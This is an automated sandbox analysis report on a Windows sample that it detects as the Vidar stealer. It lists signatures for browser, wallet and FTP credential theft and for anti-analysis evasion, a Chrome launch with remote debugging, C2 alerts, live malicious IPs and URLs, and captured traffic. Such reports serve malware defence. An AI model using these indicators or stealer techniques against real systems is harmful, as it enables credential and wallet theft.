Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1565632
MD5:a151487b27e539f2f2ec79ac50940872
SHA1:eb655ee0a8762714754c713e5bb3171ff1be3467
SHA256:70a4257b71a11086ab596f6122ee6a8b6ef9335f5538f79e68f48727fa1dc439
Tags:exeuser-Bitsight
Infos:

Detection

Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Attempt to bypass Chrome Application-Bound Encryption
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Vidar stealer
AI detected suspicious sample
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Entry point lies outside standard sections
Found large amount of non-executed APIs
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Browser Started with Remote Debugging
Uses 32bit PE files
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 6976 cmdline: "C:\Users\user\Desktop\file.exe" MD5: A151487B27E539F2F2EC79AC50940872)
    • chrome.exe (PID: 1904 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 4324 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2460 --field-trial-handle=2408,i,1632556289935480309,8221903715599976969,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • WerFault.exe (PID: 7604 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6976 -s 2348 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

No configs have been found

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2492376383.00000000004AE000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
      Process Memory Space: file.exe PID: 6976JoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
        Process Memory Space: file.exe PID: 6976JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: Browser Started with Remote Debugging
          Source: Process startedAuthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 6976, ParentProcessName: file.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", ProcessId: 1904, ProcessName: chrome.exe

          Suricata Signatures

          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-30T11:34:14.726966+010020442471Malware Command and Control Activity Detected95.217.25.228443192.168.2.449734TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-30T11:34:17.192474+010020518311Malware Command and Control Activity Detected95.217.25.228443192.168.2.449735TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-30T11:34:17.192337+010020490871A Network Trojan was detected192.168.2.44973595.217.25.228443TCP

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus / Scanner detection for submitted sample
          Source: file.exeAvira: detected
          Antivirus detection for URL or domain
          Source: https://kotov.lol/xAvira URL Cloud: Label: malware
          Source: https://kotov.lol/ciAvira URL Cloud: Label: malware
          Source: https://kotov.lol/Ai/Avira URL Cloud: Label: malware
          Source: https://kotov.lol/KJJJKFIIIJJJAvira URL Cloud: Label: malware
          Source: https://kotov.lol/?iiAvira URL Cloud: Label: malware
          Source: https://kotov.lol/nAvira URL Cloud: Label: malware
          Source: https://kotov.lol/Avira URL Cloud: Label: malware
          Source: https://kotov.lol/ui3Avira URL Cloud: Label: malware
          Source: https://kotov.lol/1DAvira URL Cloud: Label: malware
          Source: https://kotov.lolAvira URL Cloud: Label: malware
          Source: https://kotov.lol/2Avira URL Cloud: Label: malware
          Source: https://kotov.lol/4Avira URL Cloud: Label: malware
          Source: https://kotov.lol/LAvira URL Cloud: Label: malware
          Source: https://kotov.lol/oi9Avira URL Cloud: Label: malware
          Source: https://kotov.lol/ZAvira URL Cloud: Label: malware
          Source: https://kotov.lol/rsAvira URL Cloud: Label: malware
          Source: https://kotov.lol/.Avira URL Cloud: Label: malware
          Multi AV Scanner detection for submitted file
          Source: file.exeReversingLabs: Detection: 36%
          AI detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Machine Learning detection for sample
          Source: file.exeJoe Sandbox ML: detected
          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49730 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 95.217.25.228:443 -> 192.168.2.4:49731 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.4:49736 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.4:49758 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.4:49763 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 40.126.53.19:443 -> 192.168.2.4:49776 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49778 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.4:49779 version: TLS 1.2
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior

          Networking

          barindex
          Suricata IDS alerts for network traffic
          Source: Network trafficSuricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.4:49735 -> 95.217.25.228:443
          Source: Network trafficSuricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 95.217.25.228:443 -> 192.168.2.4:49735
          Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 95.217.25.228:443 -> 192.168.2.4:49734
          Source: global trafficHTTP traffic detected: GET /gv4dlp HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
          Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
          Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
          Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
          Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
          Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
          Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
          Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
          Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
          Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
          Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
          Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
          Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
          Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
          Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
          Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
          Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
          Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
          Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
          Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
          Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
          Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
          Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
          Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
          Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
          Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
          Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
          Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
          Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
          Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
          Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
          Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
          Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
          Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
          Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
          Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
          Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
          Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
          Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
          Source: unknownTCP traffic detected without corresponding DNS query: 40.126.53.19
          Source: unknownTCP traffic detected without corresponding DNS query: 40.126.53.19
          Source: unknownTCP traffic detected without corresponding DNS query: 40.126.53.19
          Source: unknownTCP traffic detected without corresponding DNS query: 40.126.53.19
          Source: unknownTCP traffic detected without corresponding DNS query: 40.126.53.19
          Source: unknownTCP traffic detected without corresponding DNS query: 40.126.53.19
          Source: unknownTCP traffic detected without corresponding DNS query: 40.126.53.19
          Source: unknownTCP traffic detected without corresponding DNS query: 40.126.53.19
          Source: unknownTCP traffic detected without corresponding DNS query: 40.126.53.19
          Source: unknownTCP traffic detected without corresponding DNS query: 40.126.53.19
          Source: unknownTCP traffic detected without corresponding DNS query: 40.126.53.19
          Source: unknownTCP traffic detected without corresponding DNS query: 40.126.53.19
          Source: unknownTCP traffic detected without corresponding DNS query: 40.126.53.19
          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
          Source: global trafficHTTP traffic detected: GET /gv4dlp HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6Host: kotov.lolConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=yYlL1HFAF3FGtYT&MD=6tCKpNkB HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
          Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
          Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=yYlL1HFAF3FGtYT&MD=6tCKpNkB HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
          Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
